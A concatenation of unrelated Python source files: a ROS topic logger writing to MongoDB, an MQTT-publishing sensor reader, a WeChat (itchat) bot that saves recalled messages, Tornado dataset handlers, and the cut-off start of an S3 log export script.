return self.queue.qsize()
def enqueue(self, data, topic, current_time=None):
if not self.is_quit():
if self.queue.full():
try:
self.queue.get_nowait()
self.drop_counter.increment()
self.worker_drop_counter.increment()
except Empty:
pass
#self.queue.put((topic, data, current_time or datetime.now()))
self.queue.put((topic, data, rospy.get_time(), data._connection_header))
self.in_counter.increment()
self.worker_in_counter.increment()
def dequeue(self):
while not self.is_quit():
t = None
try:
t = self.queue.get(True)
except IOError:
# Anticipate Ctrl-C
#print("Quit W1: %s" % self.name)
self.quit.value = 1
break
if isinstance(t, tuple):
self.out_counter.increment()
self.worker_out_counter.increment()
topic = t[0]
msg = t[1]
ctime = t[2]
connection_header = t[3]
if isinstance(msg, rospy.Message):
try:
#print(self.sep + threading.current_thread().getName() + "@" + topic+": ")
#pprint.pprint(doc)
meta = {}
# switched to use inserted_at to match message_store
# meta["recorded"] = ctime or datetime.now()
meta["topic"] = topic
if connection_header['latching'] == '1':
meta['latch'] = True
else:
meta['latch'] = False
if ctime is not None:
meta['inserted_at'] = datetime.utcfromtimestamp(ctime)
else:
meta['inserted_at'] = datetime.utcfromtimestamp(rospy.get_rostime().to_sec())
mongodb_store.util.store_message(self.collection, msg, meta)
except InvalidDocument, e:
print("InvalidDocument " + current_process().name + "@" + topic +": \n")
print e
except InvalidStringData, e:
print("InvalidStringData " + current_process().name + "@" + topic +": \n")
print e
else:
#print("Quit W2: %s" % self.name)
self.quit.value = 1
# we must make sure to clear the queue before exiting,
# or the parent thread might deadlock otherwise
#print("Quit W3: %s" % self.name)
self.subscriber.unregister()
self.subscriber = None
while not self.queue.empty():
t = self.queue.get_nowait()
print("STOPPED: %s" % self.name)
class SubprocessWorker(object):
def __init__(self, idnum, topic, collname, in_counter_value, out_counter_value,
drop_counter_value, queue_maxsize,
mongodb_host, mongodb_port, mongodb_name, nodename_prefix, cpp_logger):
self.name = "SubprocessWorker-%4d-%s" % (idnum, topic)
self.id = idnum
self.topic = topic
self.collname = collname
self.queue = Queue(queue_maxsize)
self.out_counter = Counter(out_counter_value)
self.in_counter = Counter(in_counter_value)
self.drop_counter = Counter(drop_counter_value)
self.worker_out_counter = Counter()
self.worker_in_counter = Counter()
self.worker_drop_counter = Counter()
self.mongodb_host = mongodb_host
self.mongodb_port = mongodb_port
self.mongodb_name = mongodb_name
self.nodename_prefix = nodename_prefix
self.quit = False
self.qsize = 0
self.thread = Thread(name=self.name, target=self.run)
mongodb_host_port = "%s:%d" % (mongodb_host, mongodb_port)
collection = "%s.%s" % (mongodb_name, collname)
nodename = WORKER_NODE_NAME % (self.nodename_prefix, self.id, self.collname)
self.process = subprocess.Popen([cpp_logger[0], "-t", topic, "-n", nodename,
"-m", mongodb_host_port, "-c", collection],
stdout=subprocess.PIPE)
self.thread.start()
def qsize(self):
return self.qsize
def run(self):
while not self.quit:
line = self.process.stdout.readline().rstrip()
if line == "": continue
arr = string.split(line, ":")
self.in_counter.increment(int(arr[0]))
self.out_counter.increment(int(arr[1]))
self.drop_counter.increment(int(arr[2]))
self.qsize = int(arr[3])
self.worker_in_counter.increment(int(arr[0]))
self.worker_out_counter.increment(int(arr[1]))
self.worker_drop_counter.increment(int(arr[2]))
def shutdown(self):
self.quit = True
self.process.kill()
self.process.wait()
class MongoWriter(object):
def __init__(self, topics = [], treat_as_regex=False,
all_topics = False, all_topics_interval = 5,
exclude_topics = [],
mongodb_host=None, mongodb_port=None, mongodb_name="roslog", mongodb_collection=None,
no_specific=False, nodename_prefix=""):
self.all_topics = all_topics
self.all_topics_interval = all_topics_interval
self.exclude_topics = exclude_topics
self.mongodb_host = mongodb_host
self.mongodb_port = mongodb_port
self.mongodb_name = mongodb_name
self.mongodb_collection = mongodb_collection
self.no_specific = no_specific
self.nodename_prefix = nodename_prefix
self.quit = False
self.topics = set()
self.collnames = set()
#self.str_fn = roslib.message.strify_message
self.sep = "\n" #'\033[2J\033[;H'
self.in_counter = Counter()
self.out_counter = Counter()
self.drop_counter = Counter()
self.workers = []
global use_setproctitle
if use_setproctitle:
setproctitle("mongodb_log MAIN")
self.exclude_regex = []
for et in self.exclude_topics:
self.exclude_regex.append(re.compile(et))
self.exclude_already = []
if treat_as_regex:
topics = self.expand_regex_to_topics(topics)
self.missing_topics = self.subscribe_topics(set(topics))
self.fill_in_topics()
if self.all_topics:
print("All topics")
self.ros_master = rosgraph.masterapi.Master(NODE_NAME_TEMPLATE % self.nodename_prefix)
self.update_topics(restart=False)
self.start_all_topics_timer()
def expand_regex_to_topics(self, topics):
expanded_topics = []
published_topics = [t[0] for t in rospy.get_published_topics()]
for pattern in topics:
exp = re.compile(pattern)
expanded_topics += filter(lambda t: exp.match(t) is not None, published_topics)
return expanded_topics
def subscribe_topics(self, topics):
# print "existing topics %s" % self.topics
# print "subscribing to topics %s" % topics
missing_topics = set()
for topic in topics:
if topic and topic[-1] == '/':
topic = topic[:-1]
if topic in self.topics: continue
if topic in self.exclude_already: continue
do_continue = False
for tre in self.exclude_regex:
if tre.match(topic):
print("*** IGNORING topic %s due to exclusion rule" % topic)
do_continue = True
self.exclude_already.append(topic)
break
if do_continue: continue
# although the collections is not strictly necessary, since MongoDB could handle
# pure topic names as collection names and we could then use mongodb[topic], we want
# to have names that go easier with the query tools, even though there is the theoretical
# possibility of name clashes (hence the check)
if self.mongodb_collection:
collname = self.mongodb_collection
else:
collname = mongodb_store.util.topic_name_to_collection_name(topic)
if collname in self.collnames:
print("Two converted topic names clash: %s, ignoring topic %s"
% (collname, topic))
continue
try:
print("Adding topic %s" % topic)
w = self.create_worker(len(self.workers), topic, collname)
self.workers.append(w)
self.collnames |= set([collname])
self.topics |= set([topic])
except Exception, e:
print('Failed to subsribe to %s due to %s' % (topic, e))
missing_topics.add(topic)
return missing_topics
def create_worker(self, idnum, topic, collname):
try:
msg_class, real_topic, msg_eval = rostopic.get_topic_class(topic, blocking=False)
except Exception, e:
print('Topic %s not announced, cannot get type: %s' % (topic, e))
raise
if real_topic is None:
raise rostopic.ROSTopicException('topic type was empty, probably not announced')
w = None
node_path = None
if not self.no_specific and msg_class == tfMessage:
print("DETECTED transform topic %s, using fast C++ logger" % topic)
node_path = find_node(PACKAGE_NAME, "mongodb_log_tf")
if not node_path:
print("FAILED to detect mongodb_log_tf, falling back to generic logger (did not build package?)")
elif not self.no_specific and msg_class == PointCloud:
print("DETECTED point cloud topic %s, using fast C++ logger" % topic)
node_path = find_node(PACKAGE_NAME, "mongodb_log_pcl")
if not node_path:
print("FAILED to detect mongodb_log_pcl, falling back to generic logger (did not build package?)")
elif not self.no_specific and msg_class == CompressedImage:
print("DETECTED compressed image topic %s, using fast C++ logger" % topic)
node_path = find_node(PACKAGE_NAME, "mongodb_log_cimg")
if not node_path:
print("FAILED to detect mongodb_log_cimg, falling back to generic logger (did not build package?)")
"""
elif msg_class == TriangleMesh:
print("DETECTED triangle mesh topic %s, using fast C++ logger" % topic)
node_path = find_node(PACKAGE_NAME, "mongodb_log_trimesh")
if not node_path:
print("FAILED to detect mongodb_log_trimesh, falling back to generic logger (did not build package?)")
"""
if node_path:
w = SubprocessWorker(idnum, topic, collname,
self.in_counter.count, self.out_counter.count,
self.drop_counter.count, QUEUE_MAXSIZE,
self.mongodb_host, self.mongodb_port, self.mongodb_name,
self.nodename_prefix, node_path)
if not w:
print("GENERIC Python logger used for topic %s" % topic)
w = WorkerProcess(idnum, topic, collname,
self.in_counter.count, self.out_counter.count,
self.drop_counter.count, QUEUE_MAXSIZE,
self.mongodb_host, self.mongodb_port, self.mongodb_name,
self.nodename_prefix)
return w
def run(self):
looping_threshold = timedelta(0, STATS_LOOPTIME, 0)
while not self.quit:
started = datetime.now()
# the following code makes sure we run once per STATS_LOOPTIME, taking
# varying run-times and interrupted sleeps into account
td = datetime.now() - started
while not self.quit and td < looping_threshold:
sleeptime = STATS_LOOPTIME - (td.microseconds + (td.seconds + td.days * 24 * 3600) * 10**6) / 10**6
if sleeptime > 0: sleep(sleeptime)
td = datetime.now() - started
def shutdown(self):
self.quit = True
if hasattr(self, "all_topics_timer"): self.all_topics_timer.cancel()
for w in self.workers:
#print("Shutdown %s" % name)
w.shutdown()
def start_all_topics_timer(self):
if not self.all_topics or self.quit: return
self.all_topics_timer = Timer(self.all_topics_interval, self.update_topics)
self.all_topics_timer.start()
def start_fill_in_topics_timer(self):
if len(self.missing_topics) == 0 or self.quit: return
self.fill_in_topics_timer = Timer(self.all_topics_interval, self.fill_in_topics)
self.fill_in_topics_timer.start()
def update_topics(self, restart=True):
"""
Called at a fixed interval (see start_all_topics_timer) to update the list of topics if we are logging all topics (e.g. --all-topics flag is given).
"""
if not self.all_topics or self.quit: return
ts = rospy.get_published_topics()
topics = set([t for t, t_type in ts if t != "/rosout" and t != "/rosout_agg"])
new_topics = topics - self.topics
self.subscribe_topics(new_topics)
if restart: self.start_all_topics_timer()
def fill_in_topics(self, restart=True):
"""
Called at a fixed interval (see start_all_topics_timer) to update the list of topics if we are logging all topics (e.g. --all-topics flag is given).
"""
if len(self.missing_topics) == 0 or self.quit: return
self.missing_topics = self.subscribe_topics(self.missing_topics)
if restart: self.start_fill_in_topics_timer()
def get_memory_usage_for_pid(self, pid):
scale = {'kB': 1024, 'mB': 1024 * 1024,
'KB': 1024, 'MB': 1024 * 1024}
try:
f = open("/proc/%d/status" % pid)
t = f.read()
f.close()
except:
return (0, 0, 0)
if t == "": return (0, 0, 0)
try:
tmp = t[t.index("VmSize:"):].split(None, 3)
size = int(tmp[1]) * scale[tmp[2]]
tmp = t[t.index("VmRSS:"):].split(None, 3)
rss = int(tmp[1]) * scale[tmp[2]]
tmp = t[t.index("VmStk:"):].split(None, 3)
stack = int(tmp[1]) * scale[tmp[2]]
return (size, rss, stack)
except ValueError:
return (0, 0, 0)
def get_memory_usage(self):
size, rss, stack = 0, 0, 0
for w in self.workers:
pmem = self.get_memory_usage_for_pid(w.process.pid)
size += pmem[0]
rss += pmem[1]
stack += pmem[2]
#print("Size: %d RSS: %s Stack: %s" % (size, rss, stack))
return (size, rss, stack)
def main(argv):
parser = OptionParser()
parser.usage += " [TOPICs...]"
parser.add_option("--nodename-prefix", dest="nodename_prefix",
help="Prefix for worker node names", metavar="ROS_NODE_NAME",
default="")
parser.add_option("--mongodb-host", dest="mongodb_host",
help="Hostname of MongoDB", metavar="HOST",
default=rospy.get_param("mongodb_host", "localhost"))
parser.add_option("--mongodb-port", dest="mongodb_port",
help="Hostname of MongoDB", type="int",
metavar="PORT", default=rospy.get_param("mongodb_port", 27017))
parser.add_option("--mongodb-name", dest="mongodb_name",
help="Name of DB in which to store values",
metavar="NAME", default="roslog")
parser.add_option("--mongodb-collection", dest="mongodb_collection",
help="Name of Collection in which to store values. All topics are stored in the collection if used this option, otherwise topic names are used as collections",
metavar="COLLECTION", default=None)
parser.add_option("-a", "--all-topics", dest="all_topics", default=False,
action="store_true",
help="Log all existing topics (still excludes /rosout, /rosout_agg)")
parser.add_option("-e", "--regex", dest="treat_as_regex", default=False,
help="Log topics matching the follow regular expression",
action="store_true")
parser.add_option("--all-topics-interval", dest="all_topics_interval", default=5,
help="Time in seconds between checks for new topics", type="int")
parser.add_option("-x", "--exclude", dest="exclude",
help="Exclude topics matching REGEX, may be given multiple times",
action="append", type="string", metavar="REGEX", default=[])
parser.add_option("--no-specific", dest="no_specific", default=False,
action="store_true", help="Disable specific loggers")
(options, args) = parser.parse_args(rospy.myargv(argv=sys.argv)[1:])
if not options.all_topics and len(args) == 0:
parser.print_help()
return
try:
rosgraph.masterapi.Master(NODE_NAME_TEMPLATE % options.nodename_prefix).getPid()
except socket.error:
print("Failed to communicate with master")
mongowriter = MongoWriter(topics=args,
treat_as_regex=options.treat_as_regex,
all_topics=options.all_topics,
all_topics_interval = options.all_topics_interval,
exclude_topics = options.exclude,
mongodb_host=options.mongodb_host,
mongodb_port=options.mongodb_port,
mongodb_name=options.mongodb_name,
mongodb_collection=options.mongodb_collection,
no_specific=options.no_specific,
nodename_prefix=options.nodename_prefix)
def signal_handler(signal, frame):
mongowriter.shutdown()
signal.signal(signal.SIGTERM, signal_handler)
signal.signal(signal.SIGINT, signal_handler)
mongowriter.run()
if __name__ == "__main__":
main(sys.argv)
|
base.py
|
import json
import copy
import threading
import array
import struct
import time
import csv
import os
import subprocess
import paho.mqtt.client as paho
import ssl
# FILL THIS WITH YOU CREDENTIALS AND CERTS FOLDER
EndPoint = "xxxxxxxxxxxxxx.iot.us-east-1.amazonaws.com"
topic = 'birds-detected'
caPath = "Certs/ca.cert"
certPath = "Certs/client.cert"
keyPath = "Certs/priv.cert"
try:
from sources.buffers import CircularBufferQueue, CircularResultsBufferQueue
except:
from buffers import CircularBufferQueue, CircularResultsBufferQueue
SHORT = 2
def on_connect(client, userdata, flags, rc):
print("Connection returned result: " + str(rc))
mqttc = paho.Client()
mqttc.on_connect = on_connect
mqttc.tls_set(caPath, certfile=certPath, keyfile=keyPath,
cert_reqs=ssl.CERT_REQUIRED, tls_version=ssl.PROTOCOL_TLSv1_2, ciphers=None)
mqttc.connect(EndPoint, 8883, keepalive=60)
class BaseReader(object):
""" Base Reader Object, describes the methods that must be implemented for each data source"""
def __init__(self, config, device_id=None, name=None, **kwargs):
self.samples_per_packet = config["CONFIG_SAMPLES_PER_PACKET"]
self.class_map = config["CLASS_MAP"]
self.loop = config["LOOP"]
self.name = name
self.source_samples_per_packet = None
self.sample_rate = None
self.config_columns = None
self.device_id = device_id
self.recording = False
self.streaming = False
self._thread = None
self._record_thread = None
self.buffer = None
self.rbuffer = None
self._lock = threading.Lock()
@property
def data_width(self):
if self.config_columns is None:
return 0
return len(self.config_columns)
@property
def packet_buffer_size(self):
return self.samples_per_packet * self.source_buffer_size
@property
def source_buffer_size(self):
if self.source_samples_per_packet is None:
return 2
return self.source_samples_per_packet * self.data_width * SHORT
@staticmethod
def _validate_config(config):
if not isinstance(config, dict):
raise Exception("Invalid Configuration")
if config.get("column_location", None) is None:
raise Exception("Invalid Configuration: no column_location")
if config.get("sample_rate", None) is None:
raise Exception("Invalid Configuration: no sample_rate")
if config.get("samples_per_packet", None) is None:
raise Exception("Invalid Configuration: no samples_per_packet")
return config
@staticmethod
def _validate_results_data(data):
try:
tmp = json.loads(data)
if isinstance(tmp, dict) and tmp:
return True
except Exception as e:
print(e)
return False
def is_recording(self):
return self.recording
def is_streaming(self):
return self.streaming
def list_available_devices(self):
return []
def _send_subscribe(self):
pass
def read_config(self):
""" read the config from the device and set the properties of the object """
config = self.read_device_config()
self.source_samples_per_packet = config.get("samples_per_packet", None)
self.sample_rate = config.get("sample_rate", None)
self.config_columns = config.get("column_location", None)
print("Setting Configuration")
return config
def update_config(self, config):
""" update the objects local config values from the app cache """
self.samples_per_packet = config["CONFIG_SAMPLES_PER_PACKET"]
self.source_samples_per_packet = config["SOURCE_SAMPLES_PER_PACKET"]
self.sample_rate = config["CONFIG_SAMPLE_RATE"]
self.config_columns = config.get("CONFIG_COLUMNS")
self.class_map = config.get("CLASS_MAP")
def connect(self):
if self._thread is None:
"Assume if there is a thread, we are already connected"
self.buffer = CircularBufferQueue(
self._lock, buffer_size=self.packet_buffer_size
)
self.rbuffer = CircularResultsBufferQueue(
self._lock, buffer_size=1)
self._send_subscribe()
time.sleep(1)
self.buffer.reset_buffer()
self._thread = threading.Thread(target=self._read_source)
self._thread.start()
time.sleep(1)
else:
print("Thread Already Started!")
def disconnect(self):
self.streaming = False
self._thread = None
self._record_thread = None
self.recording = False
self.buffer.reset_buffer()
self.rbuffer.reset_buffer()
def record_start(self, filename):
if not self.streaming:
raise Exception("Must start streaming before begging to record!")
if self.recording:
raise Exception("Only a single recording can occur at one time")
if filename is None:
raise Exception("Invalid Filename")
if not os.path.exists(os.path.dirname(filename)):
print(
"File directory does not exist, recording to data directory in gateway location."
)
if not os.path.exists("./data"):
os.mkdir("./data")
filename = os.path.join("./data", os.path.basename(filename))
self.recording = True
self._record_thread = threading.Thread(
target=self._record_data, kwargs={"filename": filename}
)
self._record_thread.start()
def record_stop(self, filename=None):
if self.recording != True:
raise Exception("Not currently recording")
self._record_thread = None
self.recording = False
return True
class BaseStreamReaderMixin(object):
def read_data(self):
""" Generator to read the data stream out of the buffer """
print("starting read")
if self._thread:
pass
else:
print("sent connect")
self.connect()
self.streaming = True
index = self.buffer.get_latest_buffer()
while self.streaming:
if index is None:
index = self.buffer.get_latest_buffer()
time.sleep(0.1)
continue
if self.buffer.is_buffer_full(index):
data = self.buffer.read_buffer(index)
index = self.buffer.get_next_index(index)
if data:
yield data
time.sleep(0.001)
print("stream ended")
def _record_data(self, filename):
with open(filename + ".csv", "w", newline="") as csvfile:
datawriter = csv.writer(csvfile, delimiter=",")
print("Starting to Record .csv")
datawriter.writerow(
[
x[0]
for x in sorted(
self.config_columns.items(), key=lambda item: item[1]
)
]
)
struct_info = "h" * self.data_width
data_reader = self.read_data()
while self.recording:
data = next(data_reader)
if data:
for row_index in range(len(data) // (self.data_width * 2)):
buff_index = row_index * self.data_width * 2
datawriter.writerow(
struct.unpack(
struct_info,
data[buff_index: buff_index +
self.data_width * 2],
)
)
print("CSV recording thread finished")
class BaseResultReaderMixin(object):
def read_device_config(self):
print("here")
return {"samples_per_packet": 1}
def _map_classification(self, results):
if self.class_map:
results["Classification"] = self.class_map.get(
results["Classification"], results["Classification"]
)
return results
def read_data(self):
""" Genrator to read the result stream out of the buffer """
print("starting result read")
if self._thread:
pass
else:
print("sent connect")
self.connect()
index = self.rbuffer.get_latest_buffer()
while self.streaming:
if index is None:
index = self.rbuffer.get_latest_buffer()
time.sleep(0.1)
continue
if self.rbuffer.is_buffer_full(index):
data = self.rbuffer.read_buffer(index)
index = self.rbuffer.get_next_index(index)
for result in data:
if self._validate_results_data(result):
mqttc.publish(topic, result)
mqttc.loop()
result = self._map_classification(json.loads(result))
result["timestap"] = time.time()
print(result)
yield json.dumps(result) + "\n"
else:
time.sleep(0.1)
print("result stream ended")
def _record_data(self, filename):
with open(filename + ".csv", "w", newline="") as out:
data_reader = self.read_data()
while self.recording:
data = next(data_reader)
if data:
out.write(data)
print("recording thread finished")
|
wx_lib.py
|
"""
参数 l类型 Text 键值
TEXT 文本 文本内容(文字消息)
MAP 地图 位置文本(位置分享)
CARD 名片 推荐人字典(推荐人的名片)
SHARING 分享 分享名称(分享的音乐或者文章等)
PICTURE 下载方法 图片/表情
RECORDING 语音 下载方法
ATTACHMENT 附件 下载方法
VIDEO 小视频 下载方法
FRIENDS 好友邀请 添加好友所需参数
SYSTEM 系统消息 更新内容的用户或群聊的UserName组成的列表
NOTE 通知 通知文本(消息撤回等)
"""
import sys
import os
import time
from datetime import datetime
from datetime import timedelta
import re
from time import sleep
# #import queue
from queue import Empty
#-#import asyncio
from setproctitle import setproctitle
import multiprocessing
from multiprocessing.managers import SyncManager
#-#import concurrent
# #import logging
import _thread
import itchat
from itchat.content import TEXT, FRIENDS, MAP, CARD, NOTE, SHARING, PICTURE, RECORDING, ATTACHMENT, VIDEO
#-#from selenium import webdriver
#-#from selenium.common.exceptions import NoSuchElementException
from IPython import embed
embed
if __name__ == '__main__':
sys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__), os.path.pardir)))
# #from applib.tools_lib import pcformat
from applib.conf_lib import getConf
from applib.log_lib import get_lan_ip
from applib.log_lib import app_log
info, debug, warn, error = app_log.info, app_log.debug, app_log.warning, app_log.error
msg_information = {}
face_bug = None # 针对表情包的内容
attachment_dir = None
class ItchatManager(object):
"""微信管理类
"""
def __init__(self, conf_path='config/pn_conf.yaml'):
global attachment_dir
self.conf_path = os.path.abspath(conf_path)
self.conf = getConf(self.conf_path, root_key='itchat')
attachment_dir = os.path.abspath(self.conf['attachment_dir'])
self.thread_id = None
self.gid = None # 记录我们群的UserName
if self.conf['use_custom_manager']:
# create proxy manager
class MySyncManager(SyncManager):
pass
MySyncManager.register('get_wx_send_q')
mgr = MySyncManager((get_lan_ip(), self.conf['custom_manager_port']), self.conf['custom_manager_authkey'].encode('utf8'))
#-# sleep(0.5) # wait for manager to start
mgr.connect()
self.q_send = mgr.get_wx_send_q()
else:
mgr = multiprocessing.Manager()
self.q_send = mgr.Queue()
self.event_exit = mgr.Event()
multiprocessing.current_process().authkey = self.conf['custom_manager_authkey'].encode('utf8') # https://bugs.python.org/issue7503
self.proc_wx = multiprocessing.Process(target=self.run, args=(self.event_exit, self.q_send))
self.proc_wx.start()
def onLogin(self):
info('itchat login ok ~')
def onExit(self):
info('itchat exit')
def run(self, event_exit, q_send):
setproctitle('wx_proc')
self.start()
if self.thread_id is None:
self.thread_id = _thread.start_new_thread(itchat.run, (), {'debug': self.conf['debug'], })
info('instance %s', itchat.instanceList[-1])
info('itchat running')
else:
info('itchat already running')
if self.gid is None: # 有时候登录后第一次查不到“我们”群,尝试多次查找
try:
debug('finding chatroom ...')
groups = itchat.get_chatrooms(update=True)
for _g in groups:
if _g['MemberCount'] == 3 and _g.Self.NickName == "刘强":
self.gid = _g['UserName']
info('我们 gid %s', self.gid)
break
else:
debug('chatroom not found')
#-# debug('%s\t%s', _g['NickName'], _g['UserName'])
#-# g = itchat.search_chatrooms(name="我们")
#-# if g:
#-# g = g[0]
#-# info('g %s %s', g['UserName'], g['MemberCount'])
#-# if g['MemberCount'] == 3 and g.Self.NickName == "刘强":
#-# self.gid = g['UserName']
#-# info('我们 gid %s', self.gid)
#-# else:
#-# debug('chatroom not found')
except Exception:
error('error finding chatroom 我们', exc_info=True)
while 1:
#-# embed()
try:
msg, who = q_send.get(timeout=30)
except KeyboardInterrupt:
warn('got KeyboardInterrupt when waiting for msg to send, exit!')
break
except Empty:
if event_exit.is_set():
info('got exit flag, exit~')
break
except Exception as e:
warn('got exception when waiting for msg to send, exit! %s', e)
break
else:
if not msg and not who:
info('break !!!')
break
self.sendMsg(msg, toUserName=who)
if event_exit.is_set():
info('got exit flag, exit~')
break
self.clean()
def start(self):
info('itchat starting ..')
itchat.auto_login(enableCmdQR=2, hotReload=True, picDir='/tmp', statusStorageDir='config/itchat.pkl', loginCallback=self.onLogin, exitCallback=self.onExit)
#-# groups = itchat.get_chatrooms()
#-# for _g in groups:
#-# info('%s\t%s', _g['NickName'], _g['UserName'])
#-# g = itchat.search_chatrooms(name="我们")
#-# if g:
#-# g = g[0]
#-# info('g %s %s', g['UserName'], g['MemberCount'])
#-# if g['MemberCount'] == 3 and g.Self.NickName == "刘强":
#-# self.gid = g['UserName']
#-# info('我们 gid %s', self.gid)
info('itchat started')
def stop(self):
itchat.logout()
info('itchat logout')
def clean(self):
self.stop()
@staticmethod
@itchat.msg_register([TEXT, PICTURE, FRIENDS, CARD, MAP, SHARING, RECORDING, ATTACHMENT, VIDEO], isFriendChat=True, isGroupChat=True, isMpChat=True)
def handle_receive_msg(msg):
global face_bug, attachment_dir
msg_time_rec = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime()) # 接受消息的时间
user_info = itchat.search_friends(userName=msg['FromUserName']) # 在好友列表中查询发送信息的好友昵称
msg_from = msg['FromUserName'] if not user_info else user_info['NickName'] # 在好友列表中查询发送信息的好友昵称
msg_time = msg['CreateTime'] # 信息发送的时间
msg_id = msg['MsgId'] # 每条信息的id
msg_content = None # 储存信息的内容
msg_share_url = None # 储存分享的链接,比如分享的文章和音乐
#-# info('[%s %s] %s', msg['Type'], msg['MsgId'], msg_from)
if msg['Type'] in ('Text', 'Friends'): # 如果发送的消息是文本或者好友推荐
msg_content = msg['Text']
info('[%s %s] %s: %s', msg['Type'], msg['MsgId'], msg_from, msg_content)
#-# info('%s', msg_content)
elif msg['Type'] in ('Attachment', 'Video', 'Picture', 'Recording'): # 如果发送的消息是附件、视屏、图片、语音
msg_content = msg['FileName'] # 内容就是他们的文件名
msg['Text'](os.path.join(attachment_dir, msg_content)) # 下载文件
info('[%s %s] %s', msg['Type'], msg['MsgId'], msg_from)
# print msg_content
elif msg['Type'] == 'Card': # 如果消息是推荐的名片
msg_content = msg['RecommendInfo']['NickName'] + '的名片' # 内容就是推荐人的昵称和性别
if msg['RecommendInfo']['Sex'] == 1:
msg_content += '性别为男'
else:
msg_content += '性别为女'
#-# info('%s', msg_content)
info('[%s %s] %s: %s', msg['Type'], msg['MsgId'], msg_from, msg_content)
elif msg['Type'] == 'Map': # 如果消息为分享的位置信息
x, y, location = re.search("<location x=\"(.*?)\" y=\"(.*?)\".*label=\"(.*?)\".*", msg['OriContent']).group(1, 2, 3)
if location is None:
msg_content = "纬度->" + x.__str__() + " 经度->" + y.__str__() # 内容为详细的地址
else:
msg_content = location
info('[%s %s] %s: %s', msg['Type'], msg['MsgId'], msg_from, msg_content)
elif msg['Type'] == 'Sharing': # 如果消息为分享的音乐或者文章,详细的内容为文章的标题或者是分享的名字
msg_content = msg['Text']
msg_share_url = msg['Url'] # 记录分享的url
#-# info('%s', msg_share_url)
info('[%s %s] %s: %s', msg['Type'], msg['MsgId'], msg_from, msg_share_url)
face_bug = msg_content
# 将信息存储在字典中,每一个msg_id对应一条信息
msg_information.update(
{
msg_id: {
"msg_from": msg_from, "msg_time": msg_time, "msg_time_rec": msg_time_rec,
"msg_type": msg["Type"],
"msg_content": msg_content, "msg_share_url": msg_share_url
}
}
)
# 去掉5分钟前的消息
l_msgid_2del = []
time_5min_early = (datetime.now() + timedelta(minutes=-5)).strftime("%Y-%m-%d %H:%M:%S")
for _msgid, _v in msg_information.items():
if _v['msg_time_rec'] <= time_5min_early:
l_msgid_2del.append(_msgid)
if l_msgid_2del:
info('del %s old msg', len(l_msgid_2del))
for _msgid in l_msgid_2del:
msg_information.pop(_msgid, None)
# 这个是用于监听是否有消息撤回
@itchat.msg_register(NOTE, isFriendChat=True, isGroupChat=True, isMpChat=True)
def information(msg):
# 这里如果这里的msg['Content']中包含消息撤回和id,就执行下面的语句
if '撤回了一条消息' in msg['Content']:
old_msg_id = re.search("\<msgid\>(.*?)\<\/msgid\>", msg['Content']).group(1) # 在返回的content查找撤回的消息的id
old_msg = msg_information.get(old_msg_id) # 得到消息
info('old msg: %s', old_msg)
if not old_msg: # 找不到消息
return
if len(old_msg_id) < 11: # 如果发送的是表情包
itchat.send_file(face_bug, toUserName='filehelper')
else: # 发送撤回的提示给文件助手
msg_body = "告诉你一个秘密~" + "\n" \
+ old_msg.get('msg_from') + " 撤回了 " + old_msg.get("msg_type") + " 消息" + "\n" \
+ old_msg.get('msg_time_rec') + "\n" \
+ "撤回了什么 ⇣" + "\n" \
+ old_msg.get('msg_content')
#如果是分享的文件被撤回了,那么就将分享的url加在msg_body中发送给文件助手
if old_msg['msg_type'] == "Sharing":
msg_body += "\n就是这个链接➣ " + old_msg.get('msg_share_url')
# 将撤回消息发送到文件助手
itchat.send_msg(msg_body, toUserName='filehelper')
# 有文件的话也要将文件发送过去
if old_msg['msg_type'] in ('Picture', 'Recording', 'Video', 'Attachment'):
f = '@fil@%s' % (old_msg['msg_content'])
itchat.send(msg=f, toUserName='filehelper')
if os.path.exists(old_msg['msg_content']):
os.remove(old_msg['msg_content'])
# 删除字典旧消息
msg_information.pop(old_msg_id)
def sendMsg(self, msg_body, toUserName='filehelper'):
if not toUserName:
toUserName = 'filehelper'
if toUserName != 'filehelper' and toUserName[0] != '@': # 需要根据用户名找微信id
users = itchat.search_friends(name=toUserName)
if users:
# # debug(f'use {users[0]["UserName"]} from {toUserName}')
toUserName = users[0]['UserName']
try:
itchat.send_msg(msg_body, toUserName)
#-# debug('send %s %s', msg_body, self.gid if self.gid else toUserName)
except Exception:
error('got except', exc_info=True)
if __name__ == '__main__':
it = ItchatManager()
while 1:
try:
sleep(10)
except KeyboardInterrupt:
info('cancel on KeyboardInterrupt..')
it.clean()
|
datasets.py
|
from __future__ import absolute_import, print_function, division
import logging
import os
import tornado.web
import yaml
from tornado import gen
from threading import Thread
from .common import BaseHandler
from ..web_datasets import DATASETS
class RefreshHandler(BaseHandler):
@tornado.web.authenticated
def get(self):
self.write('''<form action='refresh' method='POST'>
<input type='submit' value='Refresh Data'>
</form>''')
@gen.coroutine
def post(self):
logging.info('Refreshing datasets')
for ds in self.all_datasets():
yield gen.Task(RefreshHandler._reload, ds)
self.redirect('/datasets')
@staticmethod
def _reload(ds, callback=None):
t = Thread(target=lambda: callback(ds.reload()))
t.daemon = True
t.start()
class RemovalHandler(BaseHandler):
def post(self):
ds = self.request_one_ds('kind', 'name')
if not ds.user_added:
return self.visible_error(403, 'Cannot remove this dataset.')
logging.info('Removing user-added dataset: %s', ds)
del DATASETS[ds.kind][ds.name]
self.redirect('/datasets')
# Remove the dataset from user-uploaded files.
config_path = os.path.join(os.path.dirname(__file__),
'../../uploads/user_data.yml')
if os.path.exists(config_path):
config = yaml.safe_load(open(config_path))
entry = config[ds.kind].pop(ds.name)
os.remove(entry['file'])
yaml.safe_dump(config, open(config_path, 'w'), allow_unicode=True)
routes = [
(r'/_remove_dataset', RemovalHandler),
(r'/refresh', RefreshHandler),
]
|
export.py
|
#! /usr/bin/env python3
# -*- coding: utf-8 -*-
from datetime import datetime, timedelta
import gc
import logging
from multiprocessing import get_context
import os
from pathlib import Path
import queue
import sys
import traceback
from urllib.parse import urlparse
import uuid
import pandas as pd
import pyarrow as pa
import pytz
import s3fs
from s3access.normalize import deserialize_file
from s3access.parquet import write_dataset
from s3access.schema import create_schema
from s3access.wg import WaitGroup
def parse_time(object_name):
return datetime.strptime(object_name[0:19], "%Y-%m-%d-%H-%M-%S")
def create_files_index(src, hour, timezone, fs):
"""
:param str src: The filesystem, s3 or local
:param str hour: The hour being targetted in the format YYYY-MM-DD-HH
:param str timezone: The timezone from pytz
:param str fs: The filesystem
:return: A Data Frame with the set of files including path and datetime
"""
files = []
if src.startswith("s3://"):
u = urlparse(src)
files = [
